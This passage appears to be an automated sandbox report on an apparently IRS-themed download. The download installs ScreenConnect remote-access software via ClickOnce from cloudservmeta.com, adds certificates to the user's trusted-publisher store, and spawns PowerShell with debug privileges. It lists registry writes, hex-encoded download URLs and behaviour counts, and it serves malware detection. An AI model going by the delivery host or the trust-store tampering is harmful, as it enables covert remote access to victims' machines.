\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0003_none_b49fd41de7247bdc\SizeOfStronglyNamedComponent = d954090000000000 dfsvc.exe Set value (data) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0003_743ff44d8ef80381\scre..ient_4b14c015c87c1ad8_0018.0003_none_b49fd41de7 = 01 dfsvc.exe Set value (data) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0018.0003_none_5358faf9fe4098cf\Files\ScreenConnect.Core.dll_b96889d378047e27 = 01 dfsvc.exe Key created \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0003_none_b49fd41de7247bdc ScreenConnect.WindowsClient.exe Set value (data) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0018.0003_none_97ef996e4275975b\identity = 53637265656e436f6e6e6563742e57696e646f7773436c69656e742e6578652c2056657273696f6e3d32342e332e362e393035362c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c2c20747970653d77696e3332 dfsvc.exe Set value (data) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0003_none_e96e58cc0d8feed3\Transform = 01 dfsvc.exe Key created \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0003_743ff44d8ef80381\scre..dows_4b14c015c87c1ad8_0018.0003_none_57d0d2db3a dfsvc.exe Set value (data) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0018.0003_none_57d0d2db3a8eabff\Files\ScreenConnect.Windows.dll_fc0d83aff7df0b5b = 01 dfsvc.exe Set value (data) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0003_none_97ef996e4275975b\DigestMethod = 01 dfsvc.exe Set value (data) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0018.0003_none_5358faf9fe4098cf\DigestValue = b2586fb22e7ad195bc9325458249abdf103eac58 dfsvc.exe Key created \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Families\F_scre..tion_25b0fbb6ef7eb094_8c50ab2950a34bbb dfsvc.exe Set value (data) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0003_743ff44d8ef80381\scre...exe_25b0fbb6ef7eb094_0018.0003_none_97ef996e42 = 01 dfsvc.exe Key created \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata ScreenConnect.WindowsClient.exe Key created \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide ScreenConnect.WindowsClient.exe Set value (data) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Families\F_scre..tion_25b0fbb6ef7eb094_8c50ab2950a34bbb\LastRunVersion = 68747470733a2f2f636c6f7564736572766d6574612e636f6d2f42696e2f53637265656e436f6e6e6563742e436c69656e742e6170706c69636174696f6e2353637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32342e332e362e393035362c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c2f53637265656e436f6e6e6563742e57696e646f7773436c69656e742e6578652c2056657273696f6e3d32342e332e362e393035362c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c2c20747970653d77696e3332 ScreenConnect.WindowsClient.exe Set value (data) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb0 = 30000000 dfsvc.exe Set value (data) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0003_none_97ef996e4275975b\DigestValue = 13d1cbc79298191a0eeb138143e9694ec0e4f718 dfsvc.exe Key created \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks ScreenConnect.WindowsClient.exe Key created \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Software ScreenConnect.WindowsClient.exe Set value (data) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..vice_4b14c015c87c1ad8_0018.0003_none_04ac934293fffc3a\identity = 53637265656e436f6e6e6563742e436c69656e74536572766963652c2056657273696f6e3d32342e332e362e393035362c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d344231344330313543383743314144382c2070726f636573736f724172636869746563747572653d6d73696c dfsvc.exe Set value (data) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0003_none_b49fd41de7247bdc\implication!scre..tion_25b0fbb6ef7eb094_0018.0003_c08 = 68747470733a2f2f636c6f7564736572766d6574612e636f6d2f42696e2f53637265656e436f6e6e6563742e436c69656e742e6170706c69636174696f6e2353637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32342e332e362e393035362c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c dfsvc.exe Set value (data) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0003_743ff44d8ef80381\scre..vice_4b14c015c87c1ad8_0018.0003_none_04ac934293 = 01 dfsvc.exe Set value (data) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0003_none_b49fd41de7247bdc\Transform = 01 dfsvc.exe Set value (data) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0018.0003_none_57d0d2db3a8eabff\DigestMethod = 01 dfsvc.exe Set value (data) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..vice_4b14c015c87c1ad8_0018.0003_none_04ac934293fffc3a\lock!0c000000ef01580ed00700000c1400000000000000000000 = 30303030303764302c30316462333263323661623533396564 dfsvc.exe Set value (data) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0003_none_e96e58cc0d8feed3\lock!08000000ef01580ed00700000c1400000000000000000000 = 30303030303764302c30316462333263323661623533396564 dfsvc.exe Key created \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Assemblies ScreenConnect.WindowsClient.exe Set value (data) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb0 = 680074007400700073003a002f002f0063006c006f007500640073006500720076006d006500740061002e0063006f006d002f00420069006e002f00530063007200650065006e0043006f006e006e006500630074002e0043006c00690065006e0074002e006d0061006e00690066006500730074000000 dfsvc.exe Set value (data) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Families\Gc_scre..tion_4475e847c5180d5c\LastRunVersion = 68747470733a2f2f636c6f7564736572766d6574612e636f6d2f42696e2f53637265656e436f6e6e6563742e436c69656e742e6170706c69636174696f6e2353637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32342e332e362e393035362c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c2f53637265656e436f6e6e6563742e57696e646f7773436c69656e742e6578652c2056657273696f6e3d32342e332e362e393035362c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c2c20747970653d77696e3332 ScreenConnect.WindowsClient.exe Key created \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Families\Gi_scre..tion_25b0fbb6ef7eb094_9edfe039055229dd ScreenConnect.WindowsClient.exe Key created \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager dfsvc.exe Set value (data) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0003_none_e96e58cc0d8feed3\identity = 53637265656e436f6e6e6563742e436c69656e742c2056657273696f6e3d32342e332e362e393035362c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d344231344330313543383743314144382c2070726f636573736f724172636869746563747572653d6d73696c dfsvc.exe Set value (data) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0003_none_38e3d304a8f4613e\SizeOfStronglyNamedComponent = 1507020000000000 dfsvc.exe Set value (data) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0018.0003_none_57d0d2db3a8eabff\DigestValue = cbd097a5bdabfa667fec06a93dda506e5cf8384c dfsvc.exe Key created \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Assemblies dfsvc.exe Set value (data) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb0 = 680074007400700073003a002f002f0063006c006f007500640073006500720076006d006500740061002e0063006f006d002f00420069006e002f00530063007200650065006e0043006f006e006e006500630074002e0043006c00690065006e0074002e006100700070006c00690063006100740069006f006e002300530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f007700730043006c00690065006e0074002e006100700070006c00690063006100740069006f006e002c002000560065007200730069006f006e003d00320034002e0033002e0036002e0039003000350036002c002000430075006c0074007500720065003d006e00650075007400720061006c002c0020005000750062006c00690063004b006500790054006f006b0065006e003d0032003500620030006600620062003600650066003700650062003000390034002c002000700072006f0063006500730073006f0072004100720063006800690074006500630074007500720065003d006d00730069006c002f00530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f007700730043006c00690065006e0074002e006500780065002c002000560065007200730069006f006e003d00320034002e0033002e0036002e0039003000350036002c002000430075006c0074007500720065003d006e00650075007400720061006c002c0020005000750062006c00690063004b006500790054006f006b0065006e003d0032003500620030006600620062003600650066003700650062003000390034002c002000700072006f0063006500730073006f0072004100720063006800690074006500630074007500720065003d006d00730069006c002c00200074007900700065003d00770069006e00330032000000 dfsvc.exe Key created \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..core_4b14c015c87c1ad8_0018.0003_none_5358faf9fe4098cf dfsvc.exe Key created \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0003_none_38e3d304a8f4613e dfsvc.exe Set value (data) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0018.0003_none_04ac934293fffc3a\Files\ScreenConnect.ClientService.dll_e781b1c636 = 01 dfsvc.exe Key created \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0003_none_b49fd41de7247bdc dfsvc.exe Key created \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0003_743ff44d8ef80381\scre..ient_4b14c015c87c1ad8_0018.0003_none_b49fd41de7 dfsvc.exe Key created \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0003_none_b49fd41de7247bdc\Files dfsvc.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 5548 reg.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C irs.Client.exe Set value (data) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C\Blob = 0300000001000000140000007b0f360b775f76c94a12ca48445aa2d2a875701c2000000001000000b4060000308206b030820498a003020102021008ad40b260d29c4c9f5ecda9bd93aed9300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3231303432393030303030305a170d3336303432383233353935395a3069310b300906035504061302555331173015060355040a130e44696769436572742c20496e632e3141303f060355040313384469676943657274205472757374656420473420436f6465205369676e696e6720525341343039362053484133383420323032312043413130820222300d06092a864886f70d01010105000382020f003082020a0282020100d5b42f42d028ad78b75dd539591bb18842f5338ceb3d819770c5bbc48526309fa48e68d85cf5eb342407e14b4fd37843f417d71edaf9d2d5671a524f0ea157fc8899c191cc81033e4d702464b38de2087d347d4c8057126b439a99f2c53b1ff2efcb475a13a64cb3012025f310d38bb2fb08f08ae09d09c065a7fa98804935873d5119e8902178452ea19f2ce118c21accc5ee93497042328ffbc6ea1cf3656891a24d4c8211485268de10bd14575de8181365c57fb24f852c48a4568435d6f92e9caa0015d137fe1a0694c27cc8ea1b32e6cac2f4a7a3030e74a5af39b6ab6012e3e8d6b9f731e1dcade418a0d8c1234747b3a10f6ea3ab6d9806831bb76a672dd2bd441a9210818fb03b09d7c79b325ac2ff6a60548b49c193ede1b45ce06feb26f98cd5b2f93810e6eace91f5bed3fb6f9361345cbc93452883362a66285fb073ce8b262506b283d45cf615194ced62e05e33f2e8e8ec0aa7b0032b91b23679bef7ad081e75a665ccbbe34850f377911afedb50a246c8615898f57c02163c8328ad3986ecd4b70d53d0f847e675308dec30937614a65b4b5d74614d3f129176debf58cb72102941f0d5c56d267668114113589adc262b01f4894d59db78cf814a3e40475fc98150738510232159608a6454c1cc211ae838197c661ccd78384530994fff634f4cbbaa0d0853417c583d47b3fab6ec8c320902cc6c3c0c56110203010001a38201593082015530120603551d130101ff040830060101ff020100301d0603551d0e041604146837e0ebb63bf85f1186fbfe617b088865f44e42301f0603551d23041830168014ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300e0603551d0f0101ff04040302018630130603551d25040c300a06082b06010505070303307706082b06010505070101046b3069302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304106082b060105050730028635687474703a2f2f636163657274732e64696769636572742e636f6d2f446967694365727454727573746564526f6f7447342e63727430430603551d1f043c303a3038a036a0348632687474703a2f2f63726c332e64696769636572742e636f6d2f446967694365727454727573746564526f6f7447342e63726c301c0603551d20041530133007060567810c01033008060667810c010401300d06092a864886f70d01010c050003820201003a23443d8d0876ee8fbc3a99d356e0021aa5f84834f32cb6e67466f79472b100caaf6c302713129e90449f4bfd9ea37c26d537bc3a5d486d95d53f49f427bb16814550fd9cbdb685e0767e3771cb22f75aaa90cff5936ae3eb20d1d55079889a8a8ac1b6bda148187edcd8801a111918cd61998156f6c9e376e7c4e41b5f43f83e94ff76393d9ed499cf4add28eb5f26a1955848d51afed7273ffd90d17686dd1cb0605cf30da8eee089a1bd39e1384eda6ebb369dfbe521535ac3cae96af1a23edb43b833c84f38149299f5ddce546dd95d02141f40337c03e295b2c221757352cb46d8c4341ca2a54b8dcd6f76372c853f1ace26e918be9007b0437f9588208270f0cccaeffd29355c1f893855f7378a8b09a1cb0be9311aff2e195c3971e1be9ca70a06d62667b792e64e5fde7aac49cf2ea47492addb3ca49c861fe3c1561b2b23ff8fb5ea887b706be6a0bafd3a3f45a6c4e81691528b41c048844b964dab4440e38df01528ceedf11856072a2f10c40c08643c338fae288c3ccb8f880b0dbf3bf4ce1e7b8eefb5ebcbb7f07713e6e7283fac12aea52f226c41f9825c1566cc6c0ecac586c3f626330c074ba0d307026a6a4030484b34a85120bbad1b8508e2590d6dca05502bea4a1c9ea5fda0a71f0674e7f2d65290fdaf854821f9573bb49c03ed8645f4b4616ebf68e2266086eac8afa9fe941de7631b3a8656784e irs.Client.exe Key created \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579 irs.Client.exe Set value (data) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579\Blob = 0300000001000000140000004c2272fba7a7380f55e2a424e9e624aee1c145792000000001000000640700003082076030820548a00302010202100b9360051bccf66642998998d5ba97ce300d06092a864886f70d01010b05003069310b300906035504061302555331173015060355040a130e44696769436572742c20496e632e3141303f060355040313384469676943657274205472757374656420473420436f6465205369676e696e67205253413430393620534841333834203230323120434131301e170d3232303831373030303030305a170d3235303831353233353935395a3065310b30090603550406130255533110300e06035504081307466c6f72696461310e300c0603550407130554616d706131193017060355040a1310436f6e6e656374776973652c204c4c433119301706035504031310436f6e6e656374776973652c204c4c4330820222300d06092a864886f70d01010105000382020f003082020a0282020100ec489826d08d2c6de21b3cd3676db1e0e50cb1ff75ff564e9741f9574aa3640aa8297294a05b4db68abd0760b6b05b50ce92ff42a4e390be776a43e9961c722f6b3a4d5c880bcc6a61b4026f9137d36b2b7e9b86055876b9fa860dbcb164fe7f4b5b9de4799ae4e02dc1f0bee01e5d032933a2827388f8db0b482e76c441b1bd50909ef2023e1fb62196c994ce052266b28cd89253e6416044133139764db5fc45702529536bf82c775f9ec81fa27dc409530325f40cdef95b81b9ce0d42791cee72e7bd1b36c257b52257c65a28970e457513989434bfc239e2992b193e1b3cc3f11ccdd1d26d4ec9845099ab913906a42069af999c0071169b45a2ea1aa666f1904e8acb05e1823a359a291fd46b4ef7aed5935bb6ab17ebf077210726930c90f01761d6544a94e8fa614cc41d817eec734b1c3d3afb7c58fb256f0c09edc1459bddbff9940ed1958570265d67af79a9b6a16affd70fc6328c9810d5dc186e39af6fbcad49a270f237e6bcd5de0bc014bc3179cd79776591340311a42ca94f33416c2e01b59bd1d71de86ace6716bc90b2d7695d155039aa08fbac19a4d93fb784230a20a485287a16355645fc09142c602d140fa046b7bfd75328184ff7bdf8f9e0d65e6201c8d242931047f59bd328ac353777ccefa60408887b84fc3631301463461a1d73c0b5cc74d6d82905ddf923bdbab027a311cc38d3fa16f639a50203010001a382020630820202301f0603551d230418301680146837e0ebb63bf85f1186fbfe617b088865f44e42301d0603551d0e04160414338ce10a6e06d9c6ed0bc6cae736cefb8188646a300e0603551d0f0101ff04040302078030130603551d25040c300a06082b060105050703033081b50603551d1f0481ad3081aa3053a051a04f864d687474703a2f2f63726c332e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e63726c3053a051a04f864d687474703a2f2f63726c342e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e63726c303e0603551d20043730353033060667810c0104013029302706082b06010505070201161b687474703a2f2f7777772e64696769636572742e636f6d2f43505330819406082b06010505070101048187308184302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d305c06082b060105050730028650687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820201000ad79f00cf4984864c8981ecce8718aa875647f6a74608c968e16568c7aa9d711ed7341676038067f01330c91621b27a2a8894c4108c268162a31f13f9757a7d6bb3c6f19bf27c3a29896d712d85873627d827cd6471761444fabf1d31e903f791143c5b4ce5e7444aacba36d759aeba3069d195226755cbc675aa747f77596c53c96e083c45bba24479d6845eea9f2b28ba29b4dcf0bcf14aa4ce176c24e2c1b8fec3ee16e1c086db6fda97388859e83be65c03f701395b78b842c6dd1533ef642cca6fe50f6337d3f2dfedd8b28f2b28e0c98edd2151392e7cc75489f48859f1de14c81b306eb50eed7bb78be30eaada76767c4ca523a11eec5a2372d6122926ab1801a6a6778e9504791487ee47d4577154988802070f80fc535957658f954cd083546c5afb5a6567b6761275f5db20f70ab86feef94c7cfc65369d325121b69a82399bc7dc1962416f0f05cf1eee64d495a3527e464e2c68da0187093f97b673e43dddbcc067e00713f1565fcff8c3772d44b40a04e600644f22a990345f9a6b5b52963e82c81a0ce91d43a230f67b37d8debda40ea3d59d305e18adc1976516c12a8ba2bca24143b12e9527b4dca58872aa9b3a8c6ac563fc2dc02bf51be889516d35a4ba9d062417b5bdcc50ba945fae26b60d6aec03984798a6a21d3ff793cc0849e81ed55b8027411c50db776ae8feef2fdc2dafb04345261dedc054 irs.Client.exe -
NTFS ADS 1 IoCs
description ioc Process File opened for modification C:\Users\Admin\Downloads\Unconfirmed 579111.crdownload:SmartScreen msedge.exe -
Suspicious behavior: EnumeratesProcesses 34 IoCs
pid Process 2380 msedge.exe 2380 msedge.exe 1696 msedge.exe 1696 msedge.exe 976 identity_helper.exe 976 identity_helper.exe 2864 msedge.exe 2864 msedge.exe 5968 ScreenConnect.ClientService.exe 5968 ScreenConnect.ClientService.exe 5968 ScreenConnect.ClientService.exe 5968 ScreenConnect.ClientService.exe 5968 ScreenConnect.ClientService.exe 5968 ScreenConnect.ClientService.exe 5548 powershell.exe 5548 powershell.exe 5548 powershell.exe 5924 powershell.exe 5924 powershell.exe 5924 powershell.exe 5924 powershell.exe 3556 powershell.exe 3556 powershell.exe 3556 powershell.exe 5600 powershell.exe 5600 powershell.exe 5600 powershell.exe 5600 powershell.exe 5296 msiexec.exe 5296 msiexec.exe 4492 msedge.exe 4492 msedge.exe 4492 msedge.exe 4492 msedge.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 5924 powershell.exe 5600 powershell.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs
pid Process 1696 msedge.exe 1696 msedge.exe 1696 msedge.exe 1696 msedge.exe 1696 msedge.exe 1696 msedge.exe 1696 msedge.exe 1696 msedge.exe 1696 msedge.exe -
Suspicious use of AdjustPrivilegeToken 8 IoCs
description pid Process Token: SeDebugPrivilege 2000 dfsvc.exe Token: SeDebugPrivilege 5968 ScreenConnect.ClientService.exe Token: SeDebugPrivilege 6088 ScreenConnect.WindowsClient.exe Token: SeDebugPrivilege 5548 powershell.exe Token: SeDebugPrivilege 5924 powershell.exe Token: SeDebugPrivilege 3556 powershell.exe Token: SeDebugPrivilege 5600 powershell.exe Token: SeDebugPrivilege 5296 msiexec.exe -
Suspicious use of FindShellTrayWindow 37 IoCs
pid Process 1696 msedge.exe 1696 msedge.exe 1696 msedge.exe 1696 msedge.exe 1696 msedge.exe 1696 msedge.exe 1696 msedge.exe 1696 msedge.exe 1696 msedge.exe 1696 msedge.exe 1696 msedge.exe 1696 msedge.exe 1696 msedge.exe 1696 msedge.exe 1696 msedge.exe 1696 msedge.exe 1696 msedge.exe 1696 msedge.exe 1696 msedge.exe 1696 msedge.exe 1696 msedge.exe 1696 msedge.exe 1696 msedge.exe 1696 msedge.exe 1696 msedge.exe 1696 msedge.exe 1696 msedge.exe 1696 msedge.exe 1696 msedge.exe 1696 msedge.exe 1696 msedge.exe 1696 msedge.exe 1696 msedge.exe 1696 msedge.exe 1696 msedge.exe 6088 ScreenConnect.WindowsClient.exe 6088 ScreenConnect.WindowsClient.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 1696 msedge.exe 1696 msedge.exe 1696 msedge.exe 1696 msedge.exe 1696 msedge.exe 1696 msedge.exe 1696 msedge.exe 1696 msedge.exe 1696 msedge.exe 1696 msedge.exe 1696 msedge.exe 1696 msedge.exe 1696 msedge.exe 1696 msedge.exe 1696 msedge.exe 1696 msedge.exe 1696 msedge.exe 1696 msedge.exe 1696 msedge.exe 1696 msedge.exe 1696 msedge.exe 1696 msedge.exe 1696 msedge.exe 1696 msedge.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 5296 msiexec.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1696 wrote to memory of 2416 1696 msedge.exe 83 PID 1696 wrote to memory of 2416 1696 msedge.exe 83 PID 1696 wrote to memory of 1964 1696 msedge.exe 84 PID 1696 wrote to memory of 1964 1696 msedge.exe 84 PID 1696 wrote to memory of 1964 1696 msedge.exe 84 PID 1696 wrote to memory of 1964 1696 msedge.exe 84 PID 1696 wrote to memory of 1964 1696 msedge.exe 84 PID 1696 wrote to memory of 1964 1696 msedge.exe 84 PID 1696 wrote to memory of 1964 1696 msedge.exe 84 PID 1696 wrote to memory of 1964 1696 msedge.exe 84 PID 1696 wrote to memory of 1964 1696 msedge.exe 84 PID 1696 wrote to memory of 1964 1696 msedge.exe 84 PID 1696 wrote to memory of 1964 1696 msedge.exe 84 PID 1696 wrote to memory of 1964 1696 msedge.exe 84 PID 1696 wrote to memory of 1964 1696 msedge.exe 84 PID 1696 wrote to memory of 1964 1696 msedge.exe 84 PID 1696 wrote to memory of 1964 1696 msedge.exe 84 PID 1696 wrote to memory of 1964 1696 msedge.exe 84 PID 1696 wrote to memory of 1964 1696 msedge.exe 84 PID 1696 wrote to memory of 1964 1696 msedge.exe 84 PID 1696 wrote to memory of 1964 1696 msedge.exe 84 PID 1696 wrote to memory of 1964 1696 msedge.exe 84 PID 1696 wrote to memory of 1964 1696 msedge.exe 84 PID 1696 wrote to memory of 1964 1696 msedge.exe 84 PID 1696 wrote to memory of 1964 1696 msedge.exe 84 PID 1696 wrote to memory of 1964 1696 msedge.exe 84 PID 1696 wrote to memory of 1964 1696 msedge.exe 84 PID 1696 wrote to memory of 1964 1696 msedge.exe 84 PID 1696 wrote to memory of 1964 1696 